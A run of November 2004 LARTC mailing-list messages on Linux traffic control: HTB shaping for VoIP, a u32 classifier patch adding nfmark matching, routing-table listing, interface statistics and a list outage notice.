On Wed, Nov 10, 2004 at 10:24:49PM +0100, Damjan wrote: Is there a way in Linux socket programming, when using TCP sockets to be able to require notifications of when the TCP ACK packets are received. If I send some data over a TCP socket, I'd like to know for sure if the data reached its recipient. A blocking send call, that blocks until all ACK's for the data are received back, would be good enough. If you want that, you have to make your own 'tcp' with UDP. Another solution is to set a very small window size, select(2) will then return on reception on the ACK. Set the window size to one packet in that case (~1500 bytes). Good luck! -- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing Traffic Control HOWTO ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] LARTC outage
Hi LARTC admins, I'm the linuximq's mailling list admin and we figured out that your list is down since Fri Nov 5 2004. Can you please confirm this and let us know if there is any scheduled date for its return? Please let us know if we can help somehow... tks in advance. Andre --- Confidentiality Notice: This e-mail communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please notify me immediately by replying to this message and deleting it from your computer. Thank you. begin:vcard fn:Andre Correa n:Correa;Andre adr:;;;Sao Paulo;SP;;Brazil email;internet:[EMAIL PROTECTED] tel;fax:+1 503 907-8907 tel;cell:+55 11 9187-1906 x-mozilla-html:FALSE version:2.1 end:vcard
[LARTC] [PATCH] [TRY2] Use nfmark as a key in u32 classifier
Hello! This is the try number two. What was changed: - Added selectable choice in Kconfig file (thanks Jamal!) - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!). Stephen, do you have any comments on iproute2 part? I know it's not perfect but this is the best way, I think. u32 match mark it's intuitive but breaks a little the levels, u32 mark it's ok but not intuitive If you want I can rewrite it if you want. Thank you for your time. Signed-off-by: Catalin(ux aka Dino) catab at umbrella.ro --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/--- linux.orig/net/sched/Kconfig2004-10-19 00:55:06.0 +0300 +++ linux/net/sched/Kconfig 2004-11-09 12:47:36.0 +0200 @@ -334,6 +334,18 @@ config NET_CLS_IND Requires a new iproute2 You MUST NOT turn this on if you dont have an update iproute2. +config CLS_U32_MARK + bool Use nfmark as a key in U32 classifier + depends on NET_CLS_U32 + help + This allows you to match mark in a u32 filter. + Example: + tc filter add dev eth0 protocol ip parent 1:0 prio 5 u32 \ + match mark 0x0090 0x \ + match ip dst 4.4.4.4 \ + flowid 1:90 + You must use a new iproute2 to use this feature. + config NET_CLS_RSVP tristate Special RSVP classifier depends on NET_CLS NET_QOS --- linux.orig/net/sched/cls_u32.c 2004-10-19 00:53:45.0 +0300 +++ linux/net/sched/cls_u32.c 2004-11-09 13:56:42.0 +0200 @@ -27,6 +27,7 @@ * JHS: We should remove the CONFIG_NET_CLS_IND from here * eventually when the meta match extension is made available * + * nfmark match added by Catalin(ux aka Dino) BOIE catab at umbrella.ro */ #include asm/uaccess.h @@ -57,6 +58,13 @@ #include net/pkt_sched.h +struct tc_u32_mark +{ + __u32 val; + __u32 mask; + __u32 success; +}; + struct tc_u_knode { struct tc_u_knode *next; @@ -78,6 +86,9 @@ struct tc_u_knode #ifdef CONFIG_CLS_U32_PERF struct tc_u32_pcnt *pf; #endif +#ifdef CONFIG_CLS_U32_MARK + struct tc_u32_mark mark; +#endif struct tc_u32_sel sel; }; @@ -139,6 +150,16 @@ next_knode: n-pf-rcnt +=1; j = 0; #endif + +#ifdef CONFIG_CLS_U32_MARK + if ((skb-nfmark n-mark.mask) != n-mark.val) { + n = n-next; + goto next_knode; + } else { + n-mark.success++; + } +#endif + for (i = n-sel.nkeys; i0; i--, key++) { if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { @@ -615,6 +636,7 @@ static int u32_change(struct tcf_proto * struct tc_u_hnode *ht; struct tc_u_knode *n; struct tc_u32_sel *s; + struct tc_u32_mark *mark; struct rtattr *opt = tca[TCA_OPTIONS-1]; struct rtattr *tb[TCA_U32_MAX]; u32 htid; @@ -718,6 +740,16 @@ static int u32_change(struct tcf_proto * } n-fshift = i; } + +#ifdef CONFIG_CLS_U32_MARK + if (tb[TCA_U32_MARK-1] == 0 || + RTA_PAYLOAD(tb[TCA_U32_MARK-1]) sizeof(struct tc_u32_mark)) + return -EINVAL; + mark = RTA_DATA(tb[TCA_U32_MARK-1]); + memcpy(n-mark, mark, sizeof(struct tc_u32_mark)); + n-mark.success = 0; +#endif + err = u32_set_parms(tp-q, base, ht, n, tb, tca[TCA_RATE-1]); if (err == 0) { struct tc_u_knode **ins; @@ -805,6 +837,12 @@ static int u32_dump(struct tcf_proto *tp RTA_PUT(skb, TCA_U32_CLASSID, 4, n-res.classid); if (n-ht_down) RTA_PUT(skb, TCA_U32_LINK, 4, n-ht_down-handle); + +#ifdef CONFIG_CLS_U32_MARK + if (n-mark.val || n-mark.mask) + RTA_PUT(skb, TCA_U32_MARK, sizeof(n-mark), n-mark); +#endif + #ifdef CONFIG_NET_CLS_ACT /* again for backward compatible mode - we want * to work with both old and new modes of entering --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-09 09:50:45.0 +0200 @@ -190,6 +190,7 @@ enum TCA_U32_ACT, TCA_U32_INDEV, TCA_U32_PCNT, + TCA_U32_MARK, __TCA_U32_MAX }; --- iproute2-2.6.9/tc/f_u32.c.orig 2004-11-04 15:38:53.0 +0200 +++ iproute2-2.6.9/tc/f_u32.c 2004-11-09 13:59:00.0 +0200 @@ -7,6 +7,7 @@ * 2 of the License, or (at your option) any later version. * * Authors:Alexey Kuznetsov, [EMAIL PROTECTED] + * Match mark added by Catalin(ux aka Dino) BOIE catab at umbrella.ro [5 nov 2004] * */ @@ -33,7 +34,7 @@ static void explain(void) fprintf(stderr, or
[LARTC] htb , tcp over udp problem
hello i have 1:10 for tcp prio 1 1:20 for udp prio 0 under same parent, it works perfectly but if i decided to make 1:10 for all ... then voip gets slow ... i have also tried to attatched 1:20 with two more class, 1 prio for normal udp 0 prio for voip udp ... still voip gets slow i have even tried to used with iptables and tried different combinations still ... anyone can help or explain about tcp vs. udp thanks __ Do you Yahoo!? Check out the new Yahoo! Front Page. www.yahoo.com ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] command to list ip route tables
In linux one can have several route tables. But how do I list the route tables? (and no 'ip rule list' is not it) -- damjan | This is my jabber ID -- [EMAIL PROTECTED] -- not my mail address!!! ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] SEPARATING VOIP AND SURFING
Dear list: I have a problem I cannot handle yet, and need to solve it as soon as possible. Would be very greatful with anybody who can help me. I have a 512/512 link to internet, that I want to share between several computers. I have eth0, with a public IP address, conected to Internet, and also, eth1, with a private IP address, for network with the surfing computers. I have a main class with the whole 512kbit, then 2 child classes in this way (you can see the complete script at the end): class 1: rate = ceil = 64kbit, prio 0, for VOIP class 2: rate = ceil = 448kbit, for SURFING Class 2 is subdivided again in about 20 classes, for 20 surfing computers, this way: class 3: rate = 18kbit, ceil = 448kbit, prio 1, SURF I have a classical problem (I think). As you can see, first 64kbit are for VOIP, so, it is necesary the best quality, and the minimal delays. 64Kbit is pretty enough for 1 VOIP channel (it is supposed to really use no more than 20kbit). And also, the 64kbit class has the highest priority. Nevertheless, specially when all 20 users are surfing, or some user are browsing weight pages, or when 2 or more users are downloading at the same time, I cannot get VOIP to work properly, because quality becomes very poor. I have made all kind of imaginable test, probes and combinations, trying to test with different burst values for classes, attaching sfq qdiscs to all leaf classes, then only to surfing classes, then only to VOIP classes, and even, gaming with R2Q/Quantums, that would not be necessary, because 64Kbit is very more than enough. So please, does anyone have any idea how to completely separate VOIP and SURFING, making 2 independent channels, without one service affect to other ?? Very thanks in advance. If you are still able to read, after having read all this stuff, here goes my script as is now... Best Regards to everybody. Ricardo. #!/bin/bash tc qdisc add dev eth1 root handle 1: htb default 121 r2q 1 tc qdisc add dev eth0 root handle 1: htb default 20 r2q 5 tc class add dev eth1 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit tc class add dev eth0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit tc class add dev eth1 parent 1:1 classid 1:10 htb rate 64kbit ceil 64kbit prio 0 tc class add dev eth0 parent 1:1 classid 1:10 htb rate 64kbit ceil 64kbit prio 0 tc class add dev eth1 parent 1:1 classid 1:20 htb rate 448kbit ceil 448kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:20 htb rate 448kbit ceil 448kbit prio 1 # PER MACHINE OR IP CLASSES tc class add dev eth1 parent 1:20 classid 1:90 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:91 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:101 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:102 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:103 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:104 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:105 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:106 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:107 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:108 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:109 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:110 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:111 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:112 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:113 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:114 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:115 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:116 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:117 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:118 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:119 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:120 htb rate 18kbit ceil 448kbit prio 1 tc class add dev eth1 parent 1:20 classid 1:121 htb rate 18kbit ceil 448kbit prio 1 # SFQ QDISCS PER LEAF CLASS # VOIP tc qdisc add dev eth0 parent 1:10 handle 10: sfq perturb 10 tc qdisc add dev eth0 parent 1:20 handle 20: sfq perturb 10 #SURFING tc qdisc add dev eth1 parent 1:10 handle 10: sfq perturb 10 tc qdisc add dev eth1 parent 1:90 handle 90: sfq perturb 10 tc qdisc add dev eth1 parent 1:91 handle 91: sfq perturb 10 tc qdisc add dev eth1 parent 1:101 handle 101: sfq perturb 10 tc qdisc add dev eth1 parent 1:102 handle 102: sfq perturb 10 tc qdisc add
[LARTC] the list is back online
Hi everybody, Sometime last week outpost.ds9a.nl's disk filled up and mailman corrupted one of its databases. It took quite some time to fix this, for which I apologize. But we're back now! For posterity, the log file reported: Nov 13 13:27:33 2004 (25374) Delivery exception: EOF read where object expected Nov 13 13:27:33 2004 (25374) Traceback (most recent call last): File /usr/lib/mailman/Mailman/Handlers/HandlerAPI.py, line 82, in do_pipeline func(mlist, msg, msgdata) File /usr/lib/mailman/Mailman/Handlers/Hold.py, line 152, in process hold_for_approval(mlist, msg, msgdata, NonMemberPost) File /usr/lib/mailman/Mailman/Handlers/Hold.py, line 218, in hold_for_approval mlist.HoldMessage(msg, reason, msgdata) File /var/lib/mailman/Mailman/ListAdmin.py, line 146, in HoldMessage self.__opendb() File /var/lib/mailman/Mailman/ListAdmin.py, line 70, in __opendb self.__db = marshal.load(fp) EOFError: EOF read where object expected The solution was to delete the request.db (or at least move it), which unwedged mailman mostly. The final solution was to run 'listzap' by Wichert Akkerman, which zonked the outstanding requests database, allowing the mailman administrative website to function again. Thanks Wichert! Anyhow, happy LARTC-ing! -- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing Traffic Control HOWTO ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: please check your mesages thnx
On Mon, 01 Nov 2004 11:38:45 +0100, [EMAIL PROTECTED] wrote: McAfee GroupShield Exchange ** Alert generated at: Monday, November 01, 2004 12:54:27 FLE Standard Time ** The item GSEBODY_213471_5524_1099306467.txt has been replaced by Takas mail system because it was infected by the W32/[EMAIL PROTECTED] virus. ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] Reset Statistics?
Dnia roda, 10 listopada 2004 18:10, Sven Anders napisa: Is it possible to reset the statistics (ip -s link) ?? If not, why. Maybe there is a trick? Try to restart your tc config? -- .: Jakub Gazik (zytek) .: email: [EMAIL PROTECTED] .: JID: [EMAIL PROTECTED] ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] Reset Statistics?
* Sven Anders [EMAIL PROTECTED] 2004-11-10 18:10 Is it possible to reset the statistics (ip -s link) ?? If not, why. Maybe there is a trick? The statistics are stored in the driver but you can write a kernel module calling get_stats for each netdevice and set them to 0. struct net_device *dev; rtnl_lock(); read_lock(dev_base_lock); for (dev = dev_base; dev; dev = dev-next) { struct net_device_stats *s = dev-get_stats(); memset(s, 0, sizeof(*s)); } read_unlock(dev_base_lock); rtnl_unlock(); Both, dev_base and dev_base_lock are exported symbols. Not tested but might work. ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] command to list ip route tables
Damjan wrote: In linux one can have several route tables. But how do I list the route tables? (and no 'ip rule list' is not it) ip route list table table name HTH, -- Martin ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] command to list ip route tables
On Wed, Nov 10, 2004 at 10:21:06PM +0100, Damjan wrote: In linux one can have several route tables. But how do I list the route tables? (and no 'ip rule list' is not it) with `ip rule show' you can determine which tables are set/used. with `ip route show table TABLE' you can list the table you want to look in. # ip rule show 0: from all lookup local 32766: from all lookup main 32767: from all lookup default in this example are local, main and default the tables -- Robert Felber (EDV-Leitung) Autohaus Erich Kuttendreier Drosselweg 21 81827 Muenchen Tel: +49 (0) 89 / 453 12-86 Fax: +49 (0) 89 / 453 12-80 PGP: 896CF30B PGP-Fingerprint: CF36 AA93 9716 63E8 962F 15CC A80E 1A79 BF77 25EA ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] icmp
Anybody know how to shape icmp traffic using htb.init script ? ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] What determines DROP versus delay (BACKLOG)?
On Saturday 06 November 2004 20:48, gypsy wrote: HTB: class htb 1:40 parent 1:1 leaf 40: prio 3 rate 358Kbit ceil 529Kbit \ burst 6Kb cburst 2260b Sent 145871726 bytes 97293 pkts (dropped 69, overlimits 0) rate 56741bit 37pps backlog 23p lended: 77429 borrowed: 19841 giants: 0 I would like to increase backlog because I think that would decrease dropped. 23 packets of 1500 bytes each is only 34,500 bytes. IMO, there could be up to 64K bytes. 1) What determines backlog? I'm not sure, but backlog means packets i nthe queue ready to send. You need backlog so htb can work. Backlogs means there are enough packets for htb to work. 2) How can it be altered? I't can't. 3) Am I on the right track here? I'm afraid not. Stef -- [EMAIL PROTECTED] Using Linux as bandwidth manager http://www.docum.org/ ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] What determines DROP versus delay (BACKLOG)?
gypsy wrote: HTB: class htb 1:40 parent 1:1 leaf 40: prio 3 rate 358Kbit ceil 529Kbit \ burst 6Kb cburst 2260b Sent 145871726 bytes 97293 pkts (dropped 69, overlimits 0) rate 56741bit 37pps backlog 23p lended: 77429 borrowed: 19841 giants: 0 I would like to increase backlog because I think that would decrease dropped. 23 packets of 1500 bytes each is only 34,500 bytes. IMO, there could be up to 64K bytes. 1) What determines backlog? 2) How can it be altered? If you add a queue say bfifo - you can choose the length. 3) Am I on the right track here? gypsy ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/